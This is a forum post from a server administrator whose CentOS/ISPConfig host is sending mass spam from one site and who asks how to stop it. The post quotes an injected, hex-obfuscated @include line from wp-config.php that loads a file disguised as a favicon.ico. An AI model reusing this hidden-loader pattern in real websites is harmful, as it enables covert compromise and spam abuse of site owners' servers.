CENTOS server suddenly sending spam????

I just noticed a complaint from my ISP (Verizon) that my server was generating complaints. well, I see 34,000 messages all being sent from a single domain - which is a sandbox. no website no nothing.
I killed all the messages from or to the domain with postsuper - but it keeps generating new spams!!!
Finally I removed the email record from ISPCONFIG so that domain is no longer recognized.
But I was seeing a php-cgi invocation from the user (web45) associated with that website and I kept having to kill -9.
finally I renamed the web folder of the site and that seems to have prevented it. something was hitting a url on a site hanging off this - and that hig was causing spam to be generated!
the wp-config.php of the site had a suspicious line at the top:
@include "\x2fvar\x2fwww\x2fhoc\x68eap\x6f.co\x6d/we\x62/st\x61ts/\x66avi\x63on_\x62e65\x346.i\x63o";
thats obviously /var/www/hocheapo.com/web/stats/favicon_omething.ico

and maldet was flagging this and quarantining it. but how does it keep being created??? this iseems to be dropped in the stats folder which I renamed.

removing the email record does NOT stop the spam by the way! only renaming the root away from /web has stopped it!

Any idea what is doing this? or how to prevent it 'properly'?? anything else I need to do to protect against it?

thanks!